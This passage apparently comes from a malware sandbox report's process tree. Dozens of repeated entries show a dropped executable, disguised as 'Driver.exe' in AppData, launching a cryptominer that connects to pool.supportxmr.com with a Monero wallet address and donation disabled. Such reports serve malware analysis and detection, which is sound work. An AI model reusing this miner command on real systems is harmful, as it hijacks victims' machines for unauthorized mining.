      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2432
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2876
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2640
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:760
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1296
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2104
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2856
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1612
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1644
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1580
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2840
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2424
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1324
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2132
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1720
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2000
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1324
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1476
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2944
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1652
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2080
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1448
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1988
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2820
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2168
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1508
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1692
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1820
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2980
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1452
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2624
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1276
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1540
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1684
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2340
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2096
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1644
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1948
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1720
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1264
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2476
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1604
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1940
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:284
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2612
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:3040
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1920
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1740
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2184
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1940
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:380
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1588
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1336
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1260
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1328
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:3036
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2872
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1268
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2916
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2900
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:3020
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:112
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:2332
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:1264
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:3012
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
